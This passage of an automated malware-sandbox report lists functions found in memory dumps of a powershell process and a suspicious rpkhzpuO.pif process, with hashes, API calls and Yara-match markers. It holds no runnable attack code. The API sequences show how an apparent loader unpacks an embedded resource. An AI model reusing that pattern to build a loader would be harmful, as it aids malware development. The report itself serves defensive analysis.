Instruction Fuzzy Hash: 9DD0126674631527455561BA28016FBB6CFC9C46A0F6511B6F905C3742EC51DC0103F2

Function 00B39168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab94c520e4fc63519efd89b900dab6eead43300d686ffd687bbbb29737dabaf
Instruction ID: 61d55712eee3ce31a4c1a4bc41c61e45c929aa5a30d297d2829a5a6d2d769b73
Opcode Fuzzy Hash: 6ab94c520e4fc63519efd89b900dab6eead43300d686ffd687bbbb29737dabaf
Instruction Fuzzy Hash: 2DF06D709007049BD360DB78D89D39A7BE9FB44310F004469E10ED7380DB7969808B90

Function 00B3F460 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c02ffca4d94407c25d11d27e3d3f59876e5876d5c53bbd70d86fd60102d56b
Instruction ID: 9066a02e8b698706e781917d64ea828e1d6800087b7d6e791eb192a3925e476a
Opcode Fuzzy Hash: 34c02ffca4d94407c25d11d27e3d3f59876e5876d5c53bbd70d86fd60102d56b
Instruction Fuzzy Hash: C6E0ED78D04249AFD750EFB9C88159AFFF5AF45300B2086AED888E7601E6319602DBE1

Function 00B38978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7846afc6ab36b1efbd8c1c20430d5f259be6ec47cac1598bbf55f1dd3f7e9801
Instruction ID: 75d3fb3ca39aa6dfedd43a3c17093e3612ded59866c7620ac317c3a05a232699
Opcode Fuzzy Hash: 7846afc6ab36b1efbd8c1c20430d5f259be6ec47cac1598bbf55f1dd3f7e9801
Instruction Fuzzy Hash: E9E04F35704A1497DB093779A81D3AE7B9AFBC4725F04002AE60687341DF695E1283D9

Function 00B3AF93 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7882bb0d2eeb50203f85a4f20f35183b74806ddacc379e16382cdb06e359fbc1
Instruction ID: 8571fa22b676078ebca44716ba329c15383065e0b84b4bb033892bdc376fb38f
Opcode Fuzzy Hash: 7882bb0d2eeb50203f85a4f20f35183b74806ddacc379e16382cdb06e359fbc1
Instruction Fuzzy Hash: 5AD05E26714165130F29912E78114EBFBEBCAD667063882BAF985CB785ED629C0243E2

Function 00B39550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6e964d81fe1c7101ffb6f6ecf2659a9a0940229ecdd17d648bebc15dfa4368
Instruction ID: a84e90537d1039b9411df6f5687e8c5c6e4a1fc51a55f5faeaf9c3e8436f41ab
Opcode Fuzzy Hash: 9c6e964d81fe1c7101ffb6f6ecf2659a9a0940229ecdd17d648bebc15dfa4368
Instruction Fuzzy Hash: 24D05E567023262B055420BA28017BBB1CFCAC46A0F6612B6FA09C3382EC91DC0103F2

Function 00B3DCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: d03a5e35b51babb21acd6ac93786046176e039ba3acab4a7ae08ea84c5224771
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: EEE08631B10014978B089959E4504EDFBAADBCC321F24807AD90AA7340DA32591586E1

Function 00B38743 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
Instruction ID: 5aaa9947598f71dfe10d515598a56af62dfdb4baeb2863a212215af193ec54dc
Opcode Fuzzy Hash: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
Instruction Fuzzy Hash: 22E01235808249DBCB09AF74E45B6FDBF78FB00311F50019AE9075A5A1DE341A46CBC1

Function 00B38807 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45eaf29cd280becedb6ad3dff1947024513b19998750eeffce5c8f29a3742513
Instruction ID: 9afeb1b8533f52a510c8f13e3dec70013ec4cb03ae1ca7c9858d8f2a40d4ae0e
Opcode Fuzzy Hash: 45eaf29cd280becedb6ad3dff1947024513b19998750eeffce5c8f29a3742513
Instruction Fuzzy Hash: BBE08635D082098FC714DB64E4875BE7FF4A704311F004155E90597350DE305D81CBC1

Function 00B3F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: e850b62d784a8e38cddcab9de3096f8e89bf2c2eee38e9101dd3c602797f1d20
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 58D067B0D0420A9F8780EFADC94156EFBF4EB58200F6085BA8919E7301E7329A12CBD1

Function 00B38748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
Instruction ID: f894cbb0dd0cd9045df937d0add193560a6da1d8bd1e49e49aee694c417683e7
Opcode Fuzzy Hash: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
Instruction Fuzzy Hash: D9D06735804609CBCB08ABA4E85B6BDBB78FA14311F5041A9E907561A0EE751A5ACAC5

Function 00B38810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4e1d21037098e6a0340bca876742fb5ba0e4855aaf4ad1df3a484cf0881ad8
Instruction ID: 851b703f110bcfc1445eb255cc2e0f6c369ea520b33bdf210a9d14160cb90786
Opcode Fuzzy Hash: ba4e1d21037098e6a0340bca876742fb5ba0e4855aaf4ad1df3a484cf0881ad8
Instruction Fuzzy Hash: 71D01734E0820A8BCB18EFA4E847A6EBBF8AB44301F104169ED0997350EA305D01CBC1

Function 00B37933 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c81e23c6c64df3b1e42af3e58dc00c76bd761b0bea0ce8a2e9e19907e234cb
Instruction ID: 84b1e0288668dd881255779ac6e8b0e92b52f0ed8c83f462ed5ccbdafbef46fd
Opcode Fuzzy Hash: b1c81e23c6c64df3b1e42af3e58dc00c76bd761b0bea0ce8a2e9e19907e234cb
Instruction Fuzzy Hash: 6FD0123404D382CFC7164FB495144603F31FF8225632515CFE4098A6A3CA36C959DB11

Function 00B37EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23a699396cbcd8f07e19a3b28f6d29bc31cd5c021093c771d8ac39ee6b3b55f
Instruction ID: c1857f0c618fd73bd9ffd26864e1a3383f6105432792c194d1986e7b33869803
Opcode Fuzzy Hash: a23a699396cbcd8f07e19a3b28f6d29bc31cd5c021093c771d8ac39ee6b3b55f
Instruction Fuzzy Hash: 9FC08C3140A2808FEF024730CCA20147F70EF4320530601D3CE03C7123CE248822CB42

Function 00B3BD4B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
Instruction ID: b7551b5f9965b3158033c6e68c4ed2a3edceba76ee07e45209069e06c78af61a
Opcode Fuzzy Hash: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
Instruction Fuzzy Hash: F1B0122939130006EA040E3315462E627D59AD03D2B649072F801C4451CA3DC0062140

Function 00B37940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d998be5e608b099082256e01da69171b4bea833fd794b3b054a22db456be6b
Instruction ID: b510bcf3859dc7d61e508c3efe51cba1334aae96a9fd000fa1f0c2cd722fa120
Opcode Fuzzy Hash: 27d998be5e608b099082256e01da69171b4bea833fd794b3b054a22db456be6b
Instruction Fuzzy Hash: F9B0923404470ACFC2486FB5A404814736DAF4465638004A8E81E0A7928E37E885CA44

Non-executed Functions

Function 070C1BE0 Relevance: 9.2, Strings: 7, Instructions: 403COMMON

Download Yara Rule

Strings

Jk, xrefs: 070C200B
Jk, xrefs: 070C2017
Jk, xrefs: 070C20CE
Jk, xrefs: 070C20C2
rk, xrefs: 070C1C5D
Jk, xrefs: 070C1FA1
rk, xrefs: 070C1C53

Memory Dump Source

Source File: 0000000B.00000002.2426745007.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: Jk$Jk$Jk$Jk$Jk$rk$rk
API String ID: 0-366263723
Opcode ID: 6dda0c2c8c79aa85f458ca553a1cc3d20ef05462f2c7619c00ef4c3895ef385e
Instruction ID: 9d50fb576add46ed2a49c8760c70b6cab027e9a26982147fa23de0b586d37f62
Opcode Fuzzy Hash: 6dda0c2c8c79aa85f458ca553a1cc3d20ef05462f2c7619c00ef4c3895ef385e
Instruction Fuzzy Hash: DED116F1B0420ADFD725DB6894106AEBBF6AFC6210F2882AFD515CB257DB31C841C7A1

Analysis Process: rpkhzpuO.pifPID: 1656, Parent PID: 2724COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	0%
Total number of Nodes:	1291
Total number of Limit Nodes:	53

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

o, xrefs: 00402159
W, xrefs: 004020E6
W, xrefs: 00401B23
!, xrefs: 0040201A
8, xrefs: 00401BA9
o, xrefs: 00402097
', xrefs: 00401AF6
[, xrefs: 00401B37
D, xrefs: 00401DFB
V, xrefs: 00401E19
), xrefs: 0040202E
:, xrefs: 00401B28
*, xrefs: 00401A1F
{, xrefs: 0040205B
", xrefs: 00401B0F
x, xrefs: 00401E69
5, xrefs: 00402109
v, xrefs: 0040212C
{, xrefs: 0040211D
!, xrefs: 00401B1E
V, xrefs: 00402038
*, xrefs: 004020E1
E, xrefs: 00401E0F
W, xrefs: 00402033
0, xrefs: 00401BBD
h, xrefs: 00401A6F
o, xrefs: 00401B8D
4, xrefs: 00401B64
U, xrefs: 004020F5
W, xrefs: 00401B14
v, xrefs: 0040206A
!, xrefs: 004020CF
v, xrefs: 00401E4B
., xrefs: 0040201F
___, xrefs: 0040227D
v, xrefs: 00401B5A
6, xrefs: 004020C5
_._, xrefs: 00402257
x, xrefs: 00402088
', xrefs: 00402006
4, xrefs: 00402136
{, xrefs: 00401E3C
4, xrefs: 00402074
x, xrefs: 00401B78
., xrefs: 00401B0A
%, xrefs: 004020FA
{, xrefs: 00401B4B
[, xrefs: 00402047
x, xrefs: 0040214A

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 36CD369F Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 36CD371E
GetCurrentThread.KERNEL32 ref: 36CD375B
GetCurrentProcess.KERNEL32 ref: 36CD3798
GetCurrentThreadId.KERNEL32 ref: 36CD37F1

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: feedec2852d7dfd70178d14166182306ac02af8596b003194fd41da71a4580b1
Instruction ID: f7e938d5daa9863e71969419ed4b69c52aecbf4a722bd585ca816432c7eefdac
Opcode Fuzzy Hash: feedec2852d7dfd70178d14166182306ac02af8596b003194fd41da71a4580b1
Instruction Fuzzy Hash: 295166B4901649DFDB54CFAAC948BAEBBF1FF89300F248059E109B7360D7349946CB65

Function 36CD36A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 36CD371E
GetCurrentThread.KERNEL32 ref: 36CD375B
GetCurrentProcess.KERNEL32 ref: 36CD3798
GetCurrentThreadId.KERNEL32 ref: 36CD37F1

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 16f5399b485fb98ee8b96105cb5f7be80f5be632231150aa716d0a327d177396
Instruction ID: f7e938d5daa9863e71969419ed4b69c52aecbf4a722bd585ca816432c7eefdac
Opcode Fuzzy Hash: 16f5399b485fb98ee8b96105cb5f7be80f5be632231150aa716d0a327d177396
Instruction Fuzzy Hash: 295166B4901649DFDB54CFAAC948BAEBBF1FF89300F248059E109B7360D7349946CB65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Function 36CD2060 Relevance: 1.8, APIs: 1, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 36CD21EF

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: ActiveWindow
String ID:
API String ID: 2558294473-0
Opcode ID: e989e393c56cd420a6488cbc05d6b275f5139ce53865896dba5fd1922d258d52
Instruction ID: 5ddb2f373d2732f07d3dae6920362bd8952e7716e844fc476b365005da6aca5c
Opcode Fuzzy Hash: e989e393c56cd420a6488cbc05d6b275f5139ce53865896dba5fd1922d258d52
Instruction Fuzzy Hash: CAB17374F002498FDB099FB5C4247AD7BA6BF88310F248529E606EB390DF399C46CB65

Function 36CD205B Relevance: 1.7, APIs: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 36CD21EF

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: ActiveWindow
String ID:
API String ID: 2558294473-0
Opcode ID: 2d5877a33639ff99d1c610506df27cb66b322d512167b30582b2c44fc2fcfbaf
Instruction ID: 4dcc6caa400e51980185d1580aea1b557c51d64f51f91bc7751183ef90c8f40b
Opcode Fuzzy Hash: 2d5877a33639ff99d1c610506df27cb66b322d512167b30582b2c44fc2fcfbaf
Instruction Fuzzy Hash: A5614C74E10359DFEB049FA5C844B9EBBF6FF88310F148429EA05EB290DB399846CB55

Function 36CD54C8 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 36CD555A

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9341cbb8de171a72d9003ead077e498466e8ca1cb2e7e59f945e83d4dfdeb490
Instruction ID: c91bfaf38e753c4bf7142eeef4682e1f6f9b3992d2c90313c51204b3de9b1e2c
Opcode Fuzzy Hash: 9341cbb8de171a72d9003ead077e498466e8ca1cb2e7e59f945e83d4dfdeb490
Instruction Fuzzy Hash: C03125B090424A8FCB01DFA9C844ADEBFF1FF49310F14855AD658AB352D334A946CFA5

Function 36CD38E3 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36CD396F

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 564b522cf480db669b68f3db25fc443625c01affeb42660967ea0d2df7bb5264
Instruction ID: 473a1726d6b5872b4930c30bf240b0e7e8a30547294c9f3684fe5fef7d47294f
Opcode Fuzzy Hash: 564b522cf480db669b68f3db25fc443625c01affeb42660967ea0d2df7bb5264
Instruction Fuzzy Hash: BD21E4B5D00248EFDB10CFAAD984ADEFBF4EB48320F14841AE958A3350D374A954CFA4

Function 36CD55C0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 36CD5639

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: ffa76b89b6ba1e30780bd1d961a16deb68e7edbb9a4b01aad6773ac7f4f1e470
Instruction ID: f2a9ac23f940fb6a69fc9a65f0fb8ed1ad45f16c463818ed7e11f02d5d59bcc5
Opcode Fuzzy Hash: ffa76b89b6ba1e30780bd1d961a16deb68e7edbb9a4b01aad6773ac7f4f1e470
Instruction Fuzzy Hash: 272115B5D002198FDB10DFAAC944BEEFBF9EB88320F54842AD519A3350D778A945CF64

Function 36CD38E8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36CD396F

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a2f1cdcc4eb44474d87e25d1ddbd9fbe6904175e83f51d318caab354fe27c6d3
